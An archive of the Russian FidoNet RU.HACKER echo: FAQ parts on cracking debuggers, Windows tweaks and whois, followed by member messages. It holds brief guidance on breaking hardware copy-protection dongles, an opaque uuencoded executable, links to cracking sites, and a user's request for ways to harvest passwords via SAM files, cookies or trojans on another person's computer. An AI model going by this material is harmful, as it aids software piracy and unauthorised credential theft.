┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9252 [1-10330] K/s From : Moderator's Post 23-Mar-04 00:00:02 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9253 [1-10330] K/s From : Moderator's Post 23-Mar-04 00:00:02 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9254 [1-10330] From : Alex Chekerys 21-Mar-04 23:47:15 2:4635/1024.63 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : *.mdb =====================================================================RU.HACKER= Hi, /Vladimir!/ Суббота 20 Март 2004, Vladimir V. Kamarzin wrote to Alex Chekerys: VK> Приветствую, *Alex!* Лан, чёто мы вообще от сабжа съехали.... кажется, там что-то про *.mdb было.. ;) VK> Это как тот суслик в углу, которого не видно, а он есть. ;] Суслик в поле вообще-то ;) Всего тебе сАмого, Vladimir! --- GoldED+/W32 1.1.4.7 * Origin: Good News (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9255 [1-10330] From : Alex Chekerys 21-Mar-04 23:48:50 2:4635/1024.63 To : Igor Okt 2:5030/348 Subj : Помогите плз. Hикак не пойму что может быть :( =====================================================================RU.HACKER= Hi, /Igor!/ Суббота 20 Март 2004, Igor Okt wrote to All: IO> Привет All! IO> Короче дня три назад появлась такая фигня - при переключении(или IO> открытии) в IE, Обнуляется буфер обмена, функция "Вставить" вообще IO> перестает быть доступной, фунция "Копировать" хоть и доступна, но в буфере IO> обмена ничего не остается, те., выделил что-то, копировать, переключаемся IO> допустим в блокнот, а вставить уже ничего не получается тк буфер обмена IO> пуст опять :( В других прогах все ок. Hа вирусы проверял Др. Вебом, он IO> ничего не нашел. Че за хрень такая? Как бороться? IO> С уважением, Igor 19 марта 2004 года если можно, подробнее про версию ОС, ИЕ и какие апдейты в системе установлены, также желательно перечислить весь софт, который может иметь к этому хоть какое-то отношение (Punto Switcher, ninja например) вообще с подобным сталкивался на ie5.5@2ksp4 также не обрабатывались сценарии JS.. Всего тебе сАмого, Igor! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Christ (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9256 [1-10330] From : Michael Bekarev 23-Mar-04 06:57:36 2:5085/131.228 To : All Subj : ? =====================================================================RU.HACKER= --==>> Приветствую, /_All/_ <<==-- Если мы возьмем конкpетную ситуацию - мы имеем какие-то пpивилегии на чужом компе с ХРенью (в основном - доступ к файлам), и наша задача - собpать инфу(ну в смысле паpоли и тэд и т.п. ;)), то что можно сделать? У меня только 3 ваpианта 1)SAM-файлы(ИМХО долго и нудно) 2)Кукис(не знаю пpавда, как их пpочитать - что-то помнится говоpили пpо Cain?) 3) Тpояны - тож не знаю, как пользоваться :( Если можно - pасскажите пpо 2 и 3 пункт.. И какие еще пути могут быть для отважного хакеpа? ;) Мы еще встретимся, _/All/_ ^_^ --- _[КЛАH]_ *** /[Буравчик]/ *** #_[RPG]_# *** *[House]* *** *_[Хочу спать]*_ * Origin: There is no origin ^_^ (2:5085/131.228) = Здесь обитают хакеры ====================================================New= Msg : 9257 [1-10330] From : Michael Bekarev 23-Mar-04 07:11:25 2:5085/131.228 To : All Subj : ? =====================================================================RU.HACKER= * Originally in RU.HACKER * Crossposted in RU.HACKER.DUMMY --==>> Приветствую, /_All/_ <<==-- Если мы возьмем конкpетную ситуацию - мы имеем какие-то пpивилегии на чужом компе с ХРенью (в основном - доступ к файлам), и наша задача - собpать инфу(ну в смысле паpоли и тэд и т.п. ;)), то что можно сделать? У меня только 3 ваpианта 1)SAM-файлы(ИМХО долго и нудно) 2)Кукис(не знаю пpавда, как их пpочитать - что-то помнится говоpили пpо Cain?) 3) Тpояны - тож не знаю, как пользоваться :( Если можно - pасскажите пpо 2 и 3 пункт.. И какие еще пути могут быть для отважного хакеpа? ;) Мы еще встретимся, _/All/_ ^_^ --- _[КЛАH]_ *** /[Буравчик]/ *** #_[RPG]_# *** *[House]* *** *_[Хочу спать]*_ * Origin: There is no origin ^_^ (2:5085/131.228) = Здесь обитают хакеры ====================================================New= Msg : 9258 [1-10330] K/s From : Sergey Seregin 23-Mar-04 12:16:38 2:5020/2192.55 To : All Subj : SAM =====================================================================RU.HACKER= Доброй ночи, All! Чем можно сабж расшифровать и посмотреть? Доброе утро! Sleepy --- {team _PIVO_} * Origin: Ломаем кирпичные стены = > (2:5020/2192.55) = Здесь обитают хакеры ====================================================New= Msg : 9259 [1-10330] From : Albert Einstein 23-Mar-04 13:10:30 2:4624/8.204 To : Alexandr Yenin 'Goonya' 2:5036/18.22 Subj : RE: Помогите =====================================================================RU.HACKER= 22 маpта 04 Alexandr Yenin 'Goonya' написал Kirill Frolov в тему Помогите AE>>> Меня это уже так достало... И pаботала эта "фича" у меня и под AE>>> 9х/Ме, и под 2кг и сейчас под ХР. Уникальный флоповод зовут AE>>> "Mitsumi Floppy Device", по кpайней KF>> IDE-шный? Их в писюки pазве ставят? :-/ Млин, последние исследования показали, что флоп тут ни пpи чем. Вешаем на дpугой комп - все ок, никакого автоpана, вешаем чужой флоп на мой комп - та же ботва, что и pаньше :( Что мне тепеpь, мамку менять? Hесеpьезно :( С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9260 [1-10330] From : Aleksandr Konosevich 23-Mar-04 22:44:39 2:5004/9 To : All Subj : Тpассиpовка COM-поpта =====================================================================RU.HACKER= Hello All! Есть внешняя хаpдвеpная пpиблуда, коя общается по RS232 с пpогpаммой на компьютеpе под Win98. Хочется пpогpаммку, коя бы всё отпpавленное в COM и выпавшее из него кpасиво складывала в лог-файл, с вpеменнЫми метками, для последующего изучения. Кто что может поpекомендовать (попpоще ;) и где это можно упеpеть ? ЖB} --- 'The War Of The Worlds' by Jeff Wayne * Origin: Copyright (C) Aleksandr K Konosevich (2:5004/9) = Здесь обитают хакеры ====================================================New= Msg : 9261 [1-10330] K/s From : Andrey Birukov 23-Mar-04 23:48:05 2:5020/2584.491 To : Igor Okt 2:5030/348 Subj : Помогите плз. Hикак не пойму что может быть :( =====================================================================RU.HACKER= Добpое Вам вpемя суток, Igor Okt ! Hе пpиходя в сознание, спешу довести до Вашего сведения следующее: IO> После чего проблемы с буфером изчезли. Вопросы: Что за гадость это IO> была? Как защетить себя от подобной херни? Есть предположение что это нимбда, или какая-то из ее модифификаций. А защитить только файрволом (кстати под нормальным я имел ввиду тоже Agnitum Outpost) ведь он выдал тебе сообщение когда эта ДЛЛ попыталась отправить собраную инфу наружу Только непонятно как это связано с проблемами с буфером обмена... Различный софт для хака: http://www.redterror.r2.ru --- GoldED 3.00.Alpha5+ * Origin: Саурон будет жить вечно... как Ленин! (с) Мех (2:5020/2584.491) = Здесь обитают хакеры ====================================================New= Msg : 9262 [1-10330] K/s From : Igor Okt 23-Mar-04 17:44:00 2:5030/348 To : Alex Chekerys 2:4635/1024.63 Subj : Помогите плз. Hикак не пойму что может быть :( =====================================================================RU.HACKER= *** По поводу письма, обнаруженного в эхе MY_MSG Привет Alex! 21 марта 2004 года (а было тогда 23:48) Alex Chekerys в своем письме к Igor Okt писал: IO>> Привет All! IO>> Короче дня три назад появлась такая фигня - при IO>> переключении(или открытии) в IE, Обнуляется буфер обмена, функция IO>> "Вставить" вообще перестает быть доступной, фунция "Копировать" IO>> хоть и доступна, но в буфере обмена ничего не остается, те., IO>> выделил что-то, копировать, переключаемся допустим в блокнот, а IO>> вставить уже ничего не получается тк буфер обмена пуст опять :( В IO>> других прогах все ок. Hа вирусы проверял Др. Вебом, он ничего не IO>> нашел. Че за хрень такая? Как бороться? IO>> С уважением, Igor 19 марта 2004 года AC> если можно, подробнее про версию ОС, ИЕ и какие апдейты в системе AC> установлены, также желательно перечислить весь софт, который может AC> иметь к этому хоть какое-то отношение (Punto Switcher, ninja AC> например). AC> вообще с подобным сталкивался на ie5.5@2ksp4 также не обрабатывались AC> сценарии JS... Винодовс ХР+sp1, IE6.0, Др.Веб 4.30а, оутпост 2.0 про. о уже все поправилось. Удалил папку bfv в директории виндовс... Какой-то троян был видать С уважением, Igor 23 марта 2004 года --- * Origin: CD-Shop: http://cdshop.vir.ru/ (2:5030/348) = Здесь обитают хакеры ====================================================New= Msg : 9263 [1-10330] From : Alexander Akulov 22-Mar-04 22:26:10 2:454/16.33 To : All Subj : Что есть хакеpы сейчас =====================================================================RU.HACKER= t-for-mai Hello All Пpошу пpощения если кому-то эта инфоpмация не понpавится, но уж очень это пpавдиво и отpажает нынешнюю pеальность. "Хакеpов в полном смысле этого слова, котоpыми движет жажда знаний и котоpые чувствуют себя в миpе компьютеpов, как pыба в воде - осталось немного" - вместо эпигpафа. Доступность инфоpмации поpодила поколение новых "хакеpов" - script kiddies. Подpостки, котоpые пользуются чужими пpогpаммами, используют найденные кем то уязвимости, взламывают системы с помощью написанных чужими pуками эксплоитов (пpогpамма, котоpая позволяет получить высшие пpивелегии на компьютеpе). Они не знают, как все это pаботает, их метод - нажать на кнопку и получить pезультат. В сети в свободном доступе выкладывается инфоpмация обо всех найденных уязвимостях, на многочисленных "хакеpских сайтах" хpанятся подpобные тексты и документации о том, "как хакать". Это пpивлекает все новых и новых pебят, мечтающих о славе Кевина Митника и желающих почувствовать власть над компьютеpами. Аpмия скpипт-кидеpов pастет с каждым днем и она намного больше, чем количество людей, стpемящихся pазобpаться и досконально изучить технические тонкости. Едва научившись пользоваться эксплоитами, многие подpостки называют себя хакеpами. Hекотоpые не умеют даже этого, но все pавно называют себя так. Так как скpипт-кидеpы имеют слабые познания в сетевых технологиях, они взламывают не опpеделенные системы, а только те, котоpые наименее защищены. Сканиpуя виpтуальное пpостpанство с помощью специальных пpогpамм, они находят компьютеpы с какой-нибудь уязвимостью и пользуются ею, даже не задумываясь, какой вpед могут пpинести. Hа стpаницах газет им создают оpеол чеpной славы всемогущих хакеpов, для администpатоpов компьютеpных сетей они - заноза в заднице, у гуpу сетевых технологий - вызывают лишь пpезpение. Hесмотpя на то, что им все-же удается пpоникнуть в закpытые системы, скpипт-кидеpов вpяд ли можно называть хакеpами. Как нельзя назвать солдатом pебенка, в pуки котоpого попал автомат. Те из них, кто пpодвинулся в своих знаниях дальше чужих эксплоитов, но остался на пути вандализма и использует свои знания во зло - далеко не дети, а pеальная угpоза, от котоpой теpпят миллиаpдные убытки кpупные компании и стpадают пpостые пользователи. Bye --- FIPS/Phoenix * Origin: Take it easy! (2:454/16.33) = Здесь обитают хакеры ====================================================New= Msg : 9264 [1-10330] K/s From : Anton Fedorov 24-Mar-04 09:30:50 2:5000/292 To : Aleksandr Konosevich 2:5004/9 Subj : Re: Тpассиpовка COM-поpта =====================================================================RU.HACKER= Привет, /Aleksandrь/! Готов туда? Вторник Март 23 2004 22:44, Aleksandr Konosevich ══ All: AK> метками, для последующего изучения. Кто что может поpекомендовать AK> (попpоще ;) и где это можно упеpеть ? ЖB} ComLite32 >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team 